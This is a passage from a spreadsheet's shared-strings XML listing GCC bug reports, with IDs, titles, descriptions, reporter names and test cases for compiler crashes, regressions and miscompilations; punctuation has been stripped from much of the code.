      anon(0)
      return
    }
    a[i] = 0
    *s = sym[i][0][0]
    f(s i+1)
  }
  f(buf 0)
  return 0
}</t>
  </si>
  <si>
    <t>benlynn</t>
  </si>
  <si>
    <t>GCC-47195</t>
  </si>
  <si>
    <t>[4.6 regression] New Fortran test failures</t>
  </si>
  <si>
    <t>On Linux/ia32 revision 168545 gave:
FAIL: gfortran.dg/defined_operators_1.f90  -O   (test for errors line 14)
FAIL: gfortran.dg/defined_operators_1.f90  -O  (test for excess errors)
FAIL: gfortran.dg/interface_33.f90  -O  (test for excess errors)
Revision 168539 is OK. They are caused by revision 168542:
http://gcc.gnu.org/ml/gcc-cvs/2011-01/msg00159.html</t>
  </si>
  <si>
    <t>GCC-10330</t>
  </si>
  <si>
    <t>strdup reported as undeclared with g++ -ansi under Windows NT 4.0 Sp6</t>
  </si>
  <si>
    <t>When compiling C++ code under Windows NT 4.0 Sp6 using mingw 2.0.0-3 and g++ 3.2 (mingw special 20020817-1) with -ansi the compiler complains about: e:/GNUGCC/include/c++/3.2/bits/locale_facets.tcc:2070: `strdup' undeclared
   (first use this function)
Release:
unknown</t>
  </si>
  <si>
    <t>ingwer.c.carlsen</t>
  </si>
  <si>
    <t>GCC-35900</t>
  </si>
  <si>
    <t>typecast (sign extension) missing</t>
  </si>
  <si>
    <t>In the following example the typecast (sign extension) from int
(32bit) to long (64bit) is missing. Before the compare the signed i1
is  0 and this should be kept when casting to
64bit long. Same issue for long long (also 64bit).
So we get correct ov=1 with gcc version &lt;= 4.2 but wrong ov=0 with
gcc version &gt;= 4.3. 
This issue occurs with and without optimization.
gcc version:  gcc-4_3_branch and trunk svn revision 133752
	      (gcc-4_2 and below runs fine)
int main()
{
  int ov
  unsigned u2
  int i1
  i1 = 0
  u2 = (unsigned)2147483647 + 1 
  (i1) += (u2)
  if ( (long)(i1)&lt;(long)(u2) ) ov = 1 else ov = 0
  return !ov
}</t>
  </si>
  <si>
    <t>holger.hopp</t>
  </si>
  <si>
    <t>GCC-16174</t>
  </si>
  <si>
    <t>[3.4/4.0 Regression] deducing top-level consts</t>
  </si>
  <si>
    <t>This comes from Rani Sharoni's implementation of auto_ptr:
http://tinyurl.com/2l2ge
--------------------------------------------------
template  struct K 
{
  K()
  K(K 
  K(K const
  template  K(K const
private:
  template  struct A
  template  struct A const&gt;
  {  typedef typename K::compile_time_error type }
  // This is used to reject calls to the copy constructor
  //  with objects which are top-level const. If they are
  //  const the specialization of A is instantiated and
  //  causes a compile time error. Otherwise the general
  //  template is picked up it misses definition so this
  //  ctor declaration is rejected by SFINAE and everybody
  //  is happy.
  // GCC 3.4.1pre and 3.5.0 always matches A's specialization
  //  when instantiating from foo() and this causes the error.
  template 
  K(U
}
K foo(void)
{
  return K()
}
--------------------------------------------------
This code works on any released GCC since 3.0 but stopped working on 3.4 
branch and mainline lately probably because of the work done by Nathan.
Nathan can you check if the code is indeed invalid and we are now rightfully 
rejecting it? Latest version of EDG accepts it.</t>
  </si>
  <si>
    <t>GCC-45700</t>
  </si>
  <si>
    <t>[4.5/4.6 Regression] --enable-checking=fold bootstrap failures</t>
  </si>
  <si>
    <t>On the trunk (and supposedly on 4.5 too) fold checking bootstrap fails e.g. while building dyncast.cc in libsupc++ (and some ada compilations too).
I've debugged the dyncast.cc failure the problem is that
fold_build3_loc on loc COND_EXPR type EQ_EXPR 1 0 modifies the EQ_EXPR by changing its locus.  This is because /* Convert A ? 1 : 0 to simply A.  */
folding calls pedantic_non_lvalue_loc and that one if !pedantic_lvalues
modifies the passed expr's locus.
I'd say most of the protected_set_expr_location calls in fold-const.c are suspicios.  Either it is in places where fold-const first calls build[1-5]
followed by protected_set_expr_location IMHO in these cases we should just apply Tobias' build[1-5]_loc patch and use those routines instead and the rest either should be dropped altogether (fold_convert_loc also ignores locus
if the type is already right etc.) or if the locus is really essentialy should do nothing if the locus is equal and if not do a copy_node and set the locus on the copy and return it.</t>
  </si>
  <si>
    <t>GCC-4014</t>
  </si>
  <si>
    <t>gcc reports internal erro when compiling file bafio.c</t>
  </si>
  <si>
    <t xml:space="preserve">	gcc chokes when compiling the file bafio.c
gcc    -Wall -O4    -DPACKAGE=\aterm\ -DVERSION=\1.5.3\ -DHAVE_STRDUP=1 -DHAVE_LIBDL=1 -DHAVE_LRAND48=1 -DHAVE_SRAND48=1  -I. -I.  -DNDEBUG       -save-temps -c bafio.c -o bafio-gcc.o
bafio.c: In function `write_baf':
bafio.c:1149: Internal error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
gmake: *** [bafio-gcc.o] Error 1
Release:
3.0
Environment:
System: Linux node11794.a2000.nl 2.2.17-8 #1 Fri Nov 17 16:22:25 EST 2000 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc-3.0/configure --prefix=/usr/local
How-To-Repeat:
command:
gcc    -Wall -O4    -DPACKAGE=\aterm\ -DVERSION=\1.5.3\ -DHAVE_STRDUP=1 -DHAVE_LIBDL=1 -DHAVE_LRAND48=1 -DHAVE_SRAND48=1  -I. -I.  -DNDEBUG       -save-temps -c bafio.c -o bafio-gcc.o
file (bafio.i):</t>
  </si>
  <si>
    <t>visser</t>
  </si>
  <si>
    <t>GCC-10656</t>
  </si>
  <si>
    <t>[3.3 showstopper] libffi fails with native tools on sparc-solaris2.7</t>
  </si>
  <si>
    <t>Bootstrap of gcc-3.3-20030506 fails for sparc-solaris2.7 in libffi when using native as (works with gas):
/bin/sh ./libtool --mode=compile gcc -DHAVE_CONFIG_H -I. -I../gcc-3.3-20030506/libffi -I. -I../gcc-3.3-20030506/libffi/include -Iinclude -I../gcc-3.3-20030506/libffi/src   -fexceptions -g -O2 -c -o src/sparc/v8.lo ../gcc-3.3-20030506/libffi/src/sparc/v8.S
gcc -DHAVE_CONFIG_H -I. -I../gcc-3.3-20030506/libffi -I. -I../gcc-3.3-20030506/libffi/include -Iinclude -I../gcc-3.3-20030506/libffi/src -fexceptions -g -O2 -c ../gcc-3.3-20030506/libffi/src/sparc/v8.S  -fPIC -DPIC -o src/sparc/.libs/v8.o
../gcc-3.3-20030506/libffi/src/sparc/v8.S:98:1: warning: STACKFRAME redefined
../gcc-3.3-20030506/libffi/src/sparc/v8.S:29:1: warning: this is the location of the previous definition
/usr/ccs/bin/as: /var/tmp//ccYqpCYO.s line 85: error: unknown opcode .register
/usr/ccs/bin/as: /var/tmp//ccYqpCYO.s line 85: error: invalid character (0x0a)
/usr/ccs/bin/as: /var/tmp//ccYqpCYO.s line 85: error: statement syntax
make[2]: *** [src/sparc/v8.lo] Error 1
Release:
3.3-20030506
Environment:
sparc-solaris2.7</t>
  </si>
  <si>
    <t>ce</t>
  </si>
  <si>
    <t>GCC-32579</t>
  </si>
  <si>
    <t>problem using iso_c_binding (II)</t>
  </si>
  <si>
    <t>the following generates bogus error messages:
MODULE X
  USE ISO_C_BINDING ONLY : C_F_PROCPOINTER
END MODULE X</t>
  </si>
  <si>
    <t>GCC-2878</t>
  </si>
  <si>
    <t>ARM: cannot use 3.0 to build stage 1 of bootstrap bad code generated at -O0?</t>
  </si>
  <si>
    <t>Bootstrapping the 3.0 branch on arm-linux using a compiler previously built from the same sources to build stage 1 eventually fails here:
./xgcc -B./ -B/usr/local/armv4l-unknown-linux-gnu/bin/ -isystem /usr/local/armv4l-unknown-linux-gnu/include -O2   -DIN_GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -isystem ./include  -fomit-frame-pointer -fPIC -g0 -DHAVE_GTHR_DEFAULT -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED  -I. -I. -I/home/pb/egcs/3.0/gcc/gcc -I/home/pb/egcs/3.0/gcc/gcc/. -I/home/pb/egcs/3.0/gcc/gcc/config -I/home/pb/egcs/3.0/gcc/gcc/../include  -DL_bb -c /home/pb/egcs/3.0/gcc/gcc/libgcc2.c -o libgcc/./_bb.o
In file included from /home/pb/egcs/3.0/gcc/gcc/libgcc2.c:1298:
/home/pb/egcs/3.0/gcc/gcc/gcov-io.h: In function `__store_long':
/home/pb/egcs/3.0/gcc/gcc/gcov-io.h:67: Internal compiler error in canon_hash at cse.c:2463
Please submit a full bug report with preprocessed source if appropriate.
See  for instructions.
make[3]: *** [libgcc/./_bb.o] Error 1
Since it works to use GCC 2.95 for building stage 1 it seems likely that GCC 3.0 is miscompiling itself at -O0.
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-65795</t>
  </si>
  <si>
    <t>Segfault (invalid write) for ALLOCATE statement involving COARRAYS</t>
  </si>
  <si>
    <t>Created attachment 35345
Long test case
The program below fails with a segfault at run time. The segfault is in the ALLOCATE line. Valgrind talks about:
     Invalid write of size 8
        at 0x40075F: MAIN__ (test.f90:16)
It fails here with both -fcoarray=single and -fcoarray=lib and with GCC 4.8 4.9 and 5. At a glance the original dump looks okay but I likely missed something.
Attachment: Some longer version the idea was to use it for testing that reallocation is properly done for coarrays. It still needs some refinement - after the main bug has been fixed.
----------------------------
! Compile with -fcoarray=single or -fcoarray=lib
use iso_c_binding only: c_intptr_t c_loc
implicit none
type t2
  integer allocatable :: x
end type t2
type t3
  type(t2) allocatable :: caf[:]
end type t3
type(t3) save target :: c d
integer :: stat
allocate(c%caf[*] stat=stat)
end</t>
  </si>
  <si>
    <t>GCC-7314</t>
  </si>
  <si>
    <t>templated qualified name lookup fails</t>
  </si>
  <si>
    <t>The attached program fails to compile with
nathan@manao:208&gt;g++ -c foo.cc
foo.cc: In member function `void Outer::Arg::Foo(T*) [with T = int]':
foo.cc:14:   instantiated from here
foo.cc:6: no method `Outer::Arg::NotOk'
which is wrong
Release:
2.95 3.1</t>
  </si>
  <si>
    <t>GCC-71961</t>
  </si>
  <si>
    <t>[7 Regression] 178.galgel in SPEC CPU 2000 is miscompiled</t>
  </si>
  <si>
    <t>On x86-64 r238497 miscompiled 178.galgel in SPEC CPU 2000:
[hjl@gnu-ivb-1 00000002]$ cat galgel.out.mis 
0203:                 C1 = (  -0.3411      0.2388    )
                      C1 = (  -0.3475      0.2414    )
                                    ^
0268:      Parameter Mu            =  0.1048E+05
           Parameter Mu            =  0.1068E+05
                                               ^
0269:      Parameter Tau           = -0.1024E-01
           Parameter Tau           = -0.1041E-01
                                               ^
0270:      Floquet exponent        = -0.6821    
           Floquet exponent        = -0.6950    
                                           ^
[hjl@gnu-ivb-1 00000002]$</t>
  </si>
  <si>
    <t>GCC-32705</t>
  </si>
  <si>
    <t>[4.3 regression] ICE in set_ssa_val_to at tree-ssa-sccvn.c:1022</t>
  </si>
  <si>
    <t>=== acats Summary ===
# of expected passes            2269
# of unexpected failures        46
*** FAILURES: ae2113a ae2113b c38202a c85014b c87b26b c910001 c930001 c93008b c94002b c94002d c94002e c94002f c94002g c94008c c95012a c95085a c954015 c954019 c954022 c954026 c954a03 c97113a c97201g c97201h c97201x c97202a c97205a c97205b c97305a c97305b c97305c c97305d c974002 c974003 c974008 c974009 c974010 c974011 cc1207b cc3019c cd92001 ce2103a ce2201l ce2202a ce3815a cxh1001 
nearly all of them are of the form
+===========================GNAT BUG DETECTED==============================+
| 4.3.0 20070709 (experimental) (x86_64-unknown-linux-gnu) GCC error:      |
| in set_ssa_val_to at tree-ssa-sccvn.c:1022                              |
| Error detected around ae2113b.adb:33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t>
  </si>
  <si>
    <t>GCC-42168</t>
  </si>
  <si>
    <t>[4.4/4.5 Regression] GNAT bug box with invalid anonymous access declaration</t>
  </si>
  <si>
    <t>Minor problem as the code isn't really valid. GNAT probably shouldn't
explode in this manner however.
gcc -c timer2.adb
+===========================GNAT BUG DETECTED==============================+
| 4.4.0 (x86_64-portbld-freebsd7.2) Assert_Failure sinfo.adb:2362          |
| Error detected at timer2.adb:6:25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timer2.adb
list may be incomplete
timer2.adb:6:33: extra ) ignored
compilation abandoned
gcc -c timer3.adb
+===========================GNAT BUG DETECTED==============================+
| 4.4.0 (x86_64-portbld-freebsd7.2) Assert_Failure sinfo.adb:2362          |
| Error detected at timer3.adb:4:25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list may be incomplete
raised SYSTEM.ASSERTIONS.ASSERT_FAILURE : namet.adb:616
/gnat/svn/builds/r154285/bin/gcc-r154285 -c timer2.adb
+===========================GNAT BUG DETECTED==============================+
| 4.5.0 20091118 (experimental) (x86_64-unknown-freebsd7.2) Assert_Failure sinfo.adb:2412|
| Error detected at timer2.adb:6:25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Consider also -gnatd.n switch (see debug.adb).
timer2.adb
timer2.adb:6:33: extra ) ignored
compilation abandoned
/gnat/svn/builds/r154285/bin/gcc-r154285 -c timer3.adb
+===========================GNAT BUG DETECTED==============================+
| 4.5.0 20091118 (experimental) (x86_64-unknown-freebsd7.2) Assert_Failure sinfo.adb:2412|
| Error detected at timer3.adb:4:25                                        |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Consider also -gnatd.n switch (see debug.adb).
timer3.adb
raised SYSTEM.ASSERTIONS.ASSERT_FAILURE : namet.adb:616
Using built-in specs.
Target: x86_64-portbld-freebsd7.2
Configured with: ./..//gcc-4.4.0/configure --enable-languages=cada --disable-nls --with-system-zlib --with-libiconv-prefix=/usr/local --program-suffix=44 --bindir=/usr/local/bin/gcc44 --libdir=/usr/local/lib/gcc-4.4.0 --prefix=/usr/local --mandir=/usr/local/man --infodir=/usr/local/info/gcc44 --build=x86_64-portbld-freebsd7.2
Thread model: posix
gcc version 4.4.0 (GCC) 
Using built-in specs.
COLLECT_GCC=/gnat/svn/builds/r154285/bin/gcc-r154285
COLLECT_LTO_WRAPPER=/gnat/svn/builds/r154285/libexec/gcc/x86_64-unknown-freebsd7.2/4.5.0/lto-wrapper
Target: x86_64-unknown-freebsd7.2
Configured with: /gnat/svn/src/configure --enable-languages=cc++adafortran --prefix=/gnat/svn/builds/r154285 --with-system-zlib --disable-nls --program-suffix=-r154285 --enable-libstdcxx-debug
Thread model: posix
gcc version 4.5.0 20091118 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-78198</t>
  </si>
  <si>
    <t>ICE on valid code in: tree check: expected record_type or union_type or qual_union_type have template_type_parm in lookup_base at cp/search.c:203</t>
  </si>
  <si>
    <t>Running:
$ g++  -std=gnu++11 x.ii -Wno-invalid-offsetof -c 
 JS_DECLARE_NEW_METHODS(js_new js_malloc static MOZ_ALWAYS_INLINE)
                                                                                                                                                                                                ^                                             
0x1062efc tree_check_failed(tree_node const* char const* int char const* ...)
	../../gcc/tree.c:9746
0x81661d tree_check3(tree_node* char const* int char const* tree_code tree_code tree_code)
	../../gcc/tree.h:3085
0x81661d lookup_base(tree_node* tree_node* int base_kind* int)
	../../gcc/cp/search.c:203
0x67c3a5 build_user_type_conversion_1
	../../gcc/cp/call.c:3699
0x67d46d implicit_conversion
	../../gcc/cp/call.c:1875
0x679b60 perform_implicit_conversion_flags(tree_node* tree_node* int int)
	../../gcc/cp/call.c:9968
0x67474b convert_default_arg(tree_node* tree_node* tree_node* int int)
	../../gcc/cp/call.c:7234
0x67509e build_over_call
	../../gcc/cp/call.c:7802
0x68215f build_new_method_call_1
	../../gcc/cp/call.c:8746
0x68215f build_new_method_call(tree_node* tree_node* vec** tree_node* int tree_node** int)
	../../gcc/cp/call.c:8816
0x68312e build_special_member_call(tree_node* tree_node* vec** tree_node* int int)
	../../gcc/cp/call.c:8348
0x801da7 build_new_1
	../../gcc/cp/init.c:3232
0x802705 build_new(vec** tree_node* tree_node* vec** int int)
	../../gcc/cp/init.c:3494
0x6ee15b tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
	../../gcc/cp/pt.c:16563
0x6ed269 tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
	../../gcc/cp/pt.c:16905
0x6e3ab3 tsubst_expr(tree_node* tree_node* int tree_node* bool)
	../../gcc/cp/pt.c:15984
0x6e3535 tsubst_expr(tree_node* tree_node* int tree_node* bool)
	../../gcc/cp/pt.c:15281
0x6e3344 tsubst_expr(tree_node* tree_node* int tree_node* bool)
	../../gcc/cp/pt.c:15271
0x6e3074 tsubst_expr(tree_node* tree_node* int tree_node* bool)
	../../gcc/cp/pt.c:15462
0x725eb5 instantiate_decl(tree_node* int bool)
	../../gcc/cp/pt.c:22269
Please submit a full bug report
causes ICE on a valid code.</t>
  </si>
  <si>
    <t>GCC-53149</t>
  </si>
  <si>
    <t>[4.8 Regression]: gcc.dg/20011021-1.c</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #53130 +++
The gcc.dg/20011021-1.c test still fails at r186918 but no longer with an ICE:
Running /tmp/hpautotest-gcc1/gcc/gcc/testsuite/gcc.dg/dg.exp ...
FAIL: gcc.dg/20011021-1.c near init (test for warnings line 30)
Just as with the original bug it seems to do this for all major targets so maybe there's a problem with your testing?</t>
  </si>
  <si>
    <t>GCC-30740</t>
  </si>
  <si>
    <t>Improper semantics in gnat's compilation of certain expressions involving modular arithmetic</t>
  </si>
  <si>
    <t>The problem appears in the evaluation of certain expressions with modular variables.  Without the use of the -gnato option during compilation the executable produced by gnat 3.15p on Solaris for the source code shown below produces incorrect results.  Here's a sample output line from this program:
______________________________________________________________________________
When J=2 Test_Pattern*2**J =124 or 2#1111100#	 but Test_Pattern*2**2 = 60 or 2#111100#
______________________________________________________________________________
60 is correct 124 is incorrect.
So the default behavior of the compiler does not appear to match the semantics of the Ada language standard for modular values and the workaround requires use of an option (-gnato) that should not be influencing the behavior of this program. (Overflow is not possible for modular values they must always wrap around.) 
See http://groups.google.com/group/comp.lang.ada/browse_thread/thread/4eca860272d4832b/3bca35e8bb0bdb52?hl=en#3bca35e8bb0bdb52 for a complete discussion of this problem.  
Here's the source code of a program that demonstrates this problem in my environment and according to others on comp.lang.ada other environments as well:
with Ada.Text_IO use Ada.Text_IO
procedure Strange_Typing is
   type Six_Bits is mod 2**6
   package Six_Bit_IO is new Ada.Text_IO.Modular_IO(Six_Bits)
   use Six_Bit_IO
   Test_Pattern : Six_Bits := 31         -- 5 bits of ones
begin
   Put(The test pattern is a modulo 2**6 integer = )
   Put(Test_Pattern 0)
                                           Put( or )
   Put(Test_Pattern 0 2)
   New_Line(2)
   for J in 0 .. 5 loop
      Put(When J=)
      Put(Six_Bits(J) 0) Put( )
      Put(Test_Pattern*2**J =)
      Six_Bit_IO.Put( Test_Pattern*2**J)             Put( or )
      Six_Bit_IO.Put( Test_Pattern*2**J 0 2)
      Put(Ascii.Ht 
      case J is
         when 0 =&gt;
            Put(Test_Pattern*2**0 = )
            Put( Test_Pattern*2**0 0)    Put( or )
            Put( Test_Pattern*2**0 0 2)
        when 1 =&gt;
            Put(Test_Pattern*2**1 = )
            Put( Test_Pattern*2**1 0)    Put( or )
            Put( Test_Pattern*2**1 0 2)
         when 2 =&gt;
            Put(Test_Pattern*2**2 = )
            Put( Test_Pattern*2**2 0)    Put( or )
            Put( Test_Pattern*2**2 0 2)
          when 3 =&gt;
            Put(Test_Pattern*2**3 = )
            Put( Test_Pattern*2**3 0)    Put( or )
            Put( Test_Pattern*2**3 0 2)
         when 4 =&gt;
            Put(Test_Pattern*2**4 = )
            Put( Test_Pattern*2**4 0)    Put( or )
            Put( Test_Pattern*2**4 0 2)
         when 5 =&gt;
            Put(Test_Pattern*2**5 = )
            Put( Test_Pattern*2**5 0)    Put( or )
            Put( Test_Pattern*2**5 0 2)
      end case
      New_Line
   end loop
   New_Line
end Strange_Typing</t>
  </si>
  <si>
    <t>jaffem</t>
  </si>
  <si>
    <t>GCC-36023</t>
  </si>
  <si>
    <t>[4.1/4.3/4.4 regression] ICE with cast to variable-sized object</t>
  </si>
  <si>
    <t>The following code snippet triggers an ICE on the 4.3 branch and mainline:
========================
void foo(int i)
{
  (int [i]) { 1 }
}
========================
bug.cc: In function 'void foo(int)':
bug.cc:3: internal compiler error: in tree_low_cst at tree.c:4879
Please submit a full bug report [etc.]
This is a regression on the 4.3 branch as 4.3.0 is not affected.
The ICE also appears in GCC 4.1.x but is is not present in GCC 4.2.x.</t>
  </si>
  <si>
    <t>GCC-59084</t>
  </si>
  <si>
    <t>Sub-optimal vector moves in AVX2 vectorized loop for unaligned loads.</t>
  </si>
  <si>
    <t>The simple test case below produces sub-optimal split load/stores (AVX1/16 bytes) apparently due to the fact that g_a g_b g_c are put in a common section which doesn't guarantee alignment. Compiling with -fno-common actually produces good code. Only affects C due to the described alignment issue above.
This bug might be related to or be a duplicate of #41464.
Sub-optimal code:
compiled with gcc -S -O3 -march=core-avx2 foo.c -ftree-vectorizer-verbose=1 -dp -v -da
	vmovdqu	(%rsi%rax) %xmm0	# 160	sse2_loaddquv16qi	[length = 5]
	vinserti128	$0x1 16(%rsi%rax) %ymm0 %ymm0	# 161	avx_vec_concatv32qi/1	[length = 8]
	addl	$1 %edx	# 165	*addsi_1/1	[length = 3]
	vpaddd	(%r8%rax) %ymm0 %ymm0	# 162	*addv8si3/2	[length = 6]
	vmovups	%xmm0 (%rcx%rax)	# 410	*movv16qi_internal/3	[length = 5]
	vextracti128	$0x1 %ymm0 16(%rcx%rax)	# 164	vec_extract_hi_v32qi/2	[leng
Good code:
compiled with gcc -S -O3 -march=core-avx2 foo.c -ftree-vectorizer-verbose=1 -dp -v -da -fno-common
	vmovdqa	g_a(%rax) %ymm0	# 26	*movv8si_internal/2	[length = 8]
	vpaddd	g_b(%rax) %ymm0 %ymm0	# 27	*addv8si3/2	[length = 8]
	addq	$32 %rax	# 29	*adddi_1/1	[length = 4]
	vmovaps	%ymm0 g_c-32(%rax)	# 28	*movv8si_internal/3	[length = 8]
Test case:
#include 
#include 
#define LENGTH 10000
int g_a[LENGTH]
int g_b[LENGTH]
int g_c[LENGTH]
void
foo()
{
    int i 
    for (i = 0 i &lt; LENGTH i++) {
        g_c[i] = g_a[i] + g_b[i]
    }
}</t>
  </si>
  <si>
    <t>hendrik.greving.intel</t>
  </si>
  <si>
    <t>GCC-37418</t>
  </si>
  <si>
    <t>[4.4 Regression] error: type mismatch in address expression verify_gimple failed</t>
  </si>
  <si>
    <t>With current trunk (revision 140100):
(sid)1092:tbm@em64t: ~] /usr/lib/gcc-snapshot/bin/gcc -c dovecot-failures.i
failures.c: In function 'i_set_panic_handler':
failures.c:242: error: type mismatch in address expression
void (*) (const char * struct  *)
void (*) (const char * struct  *)
callback = default_panic_handler
failures.c:242: internal compiler error: verify_gimple failed
Please submit a full bug report</t>
  </si>
  <si>
    <t>GCC-25448</t>
  </si>
  <si>
    <t>[4.0/4.1/4.2/4.3 Regression] Unfounded warnings from the AVR backend</t>
  </si>
  <si>
    <t>Hello
when compiling this code:
   procedure My_int
   pragma Machine_Attribute (My_int signal)
   pragma Export (C My_int __vector_1)
   procedure My_int is begin null end
with avr-gcc-4.x I get this warning:
demo_ada.adb:9: warning: `demo_ada__my_int' appears to be a misspelled
signal handler
I do not get this warning with gcc-3.4.x.
IMO this is caused by the misspelled-signames patch
from Theodore A. Roth:
avr.c:
[...]
{
 const char *func_name = IDENTIFIER_POINTER (DECL_NAME (*node))
 const char *attr = IDENTIFIER_POINTER (name)
 /* If the function has the 'signal' or 'interrupt' attribute test to
    make sure that the name of the function is __vector_NN so as to
    catch when the user misspells the interrupt vector name.  */
 if (strncmp (attr interrupt strlen (interrupt)) == 0)
   {
   if (strncmp (func_name __vector strlen (__vector)) != 0)
     {
      warning (0 %qs appears to be a misspelled interrupt handler
               func_name)
[...]
Ted's patch is a bit too C specific because it assumes that the source
code function name is equal the symbol name. 
(__vector_1 = __vector_1)
In Ada the source code function name (demo_ada__my_int) for interrupts is
translated to__vector_xx with the Pragma Export (..) statement.
Its not possible to define __vector_1 as a source code function name.</t>
  </si>
  <si>
    <t>GCC-34034</t>
  </si>
  <si>
    <t>perlbmk hangs with -O2 -fno-tree-dce -fno-tree-dominator-opts</t>
  </si>
  <si>
    <t>Test perlbmk from SPEC CPU2000 hangs on powerpc-linux and i686-linux when compiled with -O2 -fno-tree-dce -fno-tree-dominator-opts.  I didn't manage to get a minimized testcase that fails on both targets but do have two slightly different tests.  Both of them hang in the loop that begins for (t++ just as 253.perlbmk does.
A regression hunt on powerpc-linux identified this patch:
    http://gcc.gnu.org/viewcvs?view=rev&amp;rev=127993
    r127993 | nickc | 2007-08-31 14:28:38 +0000 (Fri 31 Aug 2007)</t>
  </si>
  <si>
    <t>GCC-60790</t>
  </si>
  <si>
    <t>libatomic convenience library selects IFUNC implementation before obtaining cpu info.</t>
  </si>
  <si>
    <t>Created attachment 32569
libatomic cpuinfo patch
We ran into this issue recently while implementing atomic memory support for GNU UPC.  We followed an approach similar to libgo -- we included libatomic_convenience.a into libgupc.a.  This lets libgupc access GCC's __atomic support without requiring the user to link explicitly with libatomic.
While debugging the UPC AMO library on a modern X86-64 platform we noticed that the locked implementation of compare-exchange-16 was being used in spite of the fact of that the CPU supports the CMPX16 operation directly.
We determined that the IFUNC selector function was being called before the constructor function in init.c had run.  Thus the libat_feat1_ecx variable was zero.  Because the feature bit wasn't set the selector function chose the CAS function which requires explicit locks.  Interestingly __atomic_is_lock_free(16 NULL) returns true as expected on this platform because it is called after the init_cpuid() constructor is called.
One way to fix this issue is to re-work the logic that queries the CPU feature register value so that it explicitly initializes the value if it is zero.  The assumption here is that __get_cpuid() will always return a non-zero value in the ECX feature register.  A patch that implements this approach is attached.</t>
  </si>
  <si>
    <t>GCC-6428</t>
  </si>
  <si>
    <t>[hppa*-hp-hpux] gmon.out is not generated when application to be profiled is linked with shared libgcc</t>
  </si>
  <si>
    <t>Using g++.old-deja/g++.law/profile1.C
g++ -pg -o profile1 profile1.C
./profile1
no gmon.out file is generated.
Whereas
gcc -pg -o profile1 profile1.C
./profile1
produces a gmon.out file.
gcc -pg -o profile1 profile1.C -shared-libgcc
./profile1
does not produce a gmon.out file.
.
When using g++ we have the following link command:
/opt/gnu/lib/gcc-lib/hppa2.0w-hp-hpux11.11/3.1/collect2 -L/lib/pa1.1 -L/usr/lib/pa1.1 -z -u main -o profile1 /usr/ccs/lib/gcrt0.o -L/opt/gnu/lib/gcc-lib/hppa2.0w-hp-hpux11.11/3.1 -L/usr/ccs/bin -L/usr/ccs/lib -L/opt/langtools/lib -L/opt/gnu/lib/gcc-lib/hppa2.0w-hp-hpux11.11/3.1/../../.. /var/tmp//cccLhdMV.o -lstdc++ -lm -lgcc_s -lgcc -L/lib/libp/ -lc -lgcc_s -lgcc
As can be seen -lgcc_s occurs before -L/lib/libp/ -lc.
The shared library list for libgcc_s.1 is:
         shared library list:
             dynamic   /usr/lib/libc.2
This version of libc isn't suitable for profiling.
Looking at the undefined symbols in the object there
are various undefined references including _close.
I appears that various routines are duplicated and
probably the wrong version of close is being called
at exit. 
/usr/libp contains libc.a and libpthread.a.  There
is no shared libc support for profiling.  As a result
it doesn't make any sense to use shared libraries with
-pg.
Release:
gcc 3.1 (prerelease)
Environment:
hppa*-hp-hpux*</t>
  </si>
  <si>
    <t>GCC-13768</t>
  </si>
  <si>
    <t>Incoherent behaviour in instantiation between -funit-at-a-time and -fno-unit-at-a-time</t>
  </si>
  <si>
    <t>Bogus-looking syntax error when compiled -O2 no error if not. Expansion files (.ii) differ with/without too.</t>
  </si>
  <si>
    <t>igodard</t>
  </si>
  <si>
    <t>GCC-2623</t>
  </si>
  <si>
    <t>[ARM/2.95] Wrong code when accessing unsigned short in a structure.</t>
  </si>
  <si>
    <t>Wrong code is generated when cross compiling the attached code for the arm architecture. An unsigned short (16 bit)  in a structure) is accessed as a 32 bit integer.
Release:
2.95.3 (20010315)
Environment:
host: SunOs 5.6
target: arm-little-elf
Note: We are mixing arm and thumb code and we have therefore
added the thumb-interwork option to the library compilation:
TCFLGS = -fleading-underscore -mthumb-interwork
How-To-Repeat:
The following piece of C code generates wrong assembler code (accesses a unsigned short as an 32 bit integer).
2/proj/tools/arm/bin/arm-little-elf-gcc -O2 -g -Wall -c /2/proj/appl/router/ppp/45/test.c -o gal/test.o 
The following warnings are generated:
line 21: initialization makes pointer from integer without a cast
line 45: initialization makes pointer from integer without a cast
*****file: test.c ***********************************
typedef struct NBnotification_t {
    unsigned short  code
    unsigned short prio
    unsigned short env
    char *txt
    unsigned long ssp
    unsigned char idlen
    unsigned char  *id
    unsigned char trap
    unsigned char varbind_switch
    unsigned long filter
}  NBNOTIFICATION
static NBNOTIFICATION NBNotifications[] =
{
{   1 2 3
    4 5
    0 0 0 0
    6}
{   123
    4 0
    12 0 13 0
    14 }
{   0 0 0    0 0    0 0 0 0    0 }
}
NBNOTIFICATION *nbFindNotif(unsigned short code)
{
    NBNOTIFICATION *not = 
    while (not-&gt;code != (unsigned short)0)
    {
     if (code == not-&gt;code)
     return(not)
        not++
    }
    return(0)
}
*********************************
The resulting disassembled output is listed below:
gal/test.o:     file format elf32-littlearm
Disassembly of section .text:
00000000 :
   0:   e1a0c00d        mov     r12 sp
   4:   e92dd800        stmdb   sp! {r11 r12 lr pc}
   8:   e24cb004        sub     r11 r12 #4     0x4
   c:   e59f1038        ldr     r1 [pc #38]    4c 
  10:   e1a00800        mov     r0 r0 lsl #16
  14:   e1d120b0        ldrh    r2 [r1]
  18:   e1a00840        mov     r0 r0 asr #16
  1c:   e3520000        cmp     r2 #0   0x0
  20:   0a00000f        beq     64 
  24:   e1a03800        mov     r3 r0 lsl #16
  28:   e1a00823        mov     r0 r3 lsr #16
  2c:   e1500002        cmp     r0 r2
  30:   01a00001        moveq   r0 r1
  34:   091ba800        ldmeqdb r11 {r11 sp pc}
  38:   e5b12020        ldr     r2 [r1 #32]! /* Wrong: should be ldrh */
  3c:   e3520000        cmp     r2 #0   0x0
  40:   1a000009        bne     6c 
  44:   e3a00000        mov     r0 #0   0x0
  48:   e91ba800        ldmdb   r11 {r11 sp pc}
  4c:   00000000        andeq   r0 r0 r0</t>
  </si>
  <si>
    <t>niels.beier</t>
  </si>
